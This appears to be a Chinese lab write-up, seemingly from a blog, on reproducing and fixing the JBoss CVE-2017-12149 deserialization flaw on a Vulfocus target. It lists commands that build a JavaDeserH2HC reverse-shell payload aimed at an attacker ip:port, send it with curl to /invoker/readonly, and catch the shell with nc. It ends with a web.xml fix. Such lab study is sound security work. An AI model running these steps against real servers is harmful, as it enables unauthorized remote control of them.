CVE-2017-12149 复现及修复

CVE-2017-12149 复现及修复

漏洞名称:JBOOS AS 6.X 反序列化漏洞

CVE编号:CVE-2017-12149

漏洞等级:高危

影响版本:5.x和6.x版本

漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。

一.实验环境

软件版本
JBossV6.0Final
jboss-_CVE-2017-12149(工具)

二.实验环境

实验平台提供漏洞: VULFOCUS

攻击机:centos服务器

三.实验步骤

打开网址

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9rpIJnqT-1627107431913)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724102800723.png)]

我先是用御剑去扫了一下目录 发现这个目录 打开是500 所以一遍情况下存在漏洞

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ARFDuGuu-1627107431915)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724102727812.png)]

方法一 工具 jboss-_CVE-2017-12149

使用工具 jboss-_CVE-2017-12149

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JqKh12wG-1627107431916)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724103135506.png)]

可以发现是root权限 所以 直接输入命令

find -name flag* 查询flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AljQCq4S-1627107431917)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724103614462.png)]

方法二 反弹shell

首先去了解一下什么是 反弹shell

然后操作实验

工具 JavaDeserH2HC

操作:centos服务器

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port 
//反弹shell的IP和端口

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JmuG3HFn-1627107431918)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101214866.png)]

curl 漏洞ip/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RKZRJ4ZM-1627107431920)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101323717.png)]

监听

nc -vlp 端口

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yfxc6NGn-1627107431920)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101410837.png)]

获得shell 直接执行ls 查看目录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7S4gzEvO-1627107431921)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101502531.png)]

ls /tmp 找到flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7b8x5zGY-1627107431922)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101540579.png)]

修复漏洞

首先进入/jboss/server/default/deploy/http-invoker.sar/invoker.war/WEB-INF/web.xml 目录

cd 靶机的根目录/jboss/server/default/deploy/http-invoker.sar/invoker.war/WEB-INF/web.xml

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-elzGnC4L-1627107431922)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724141130723.png)]

进行修改

<url-pattern>*</url-pattern>     在安全约束里添加修改

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FREXMCnP-1627107431923)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724140957302.png)]

最后重启一下jboss服务 漏洞不再可以访问

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值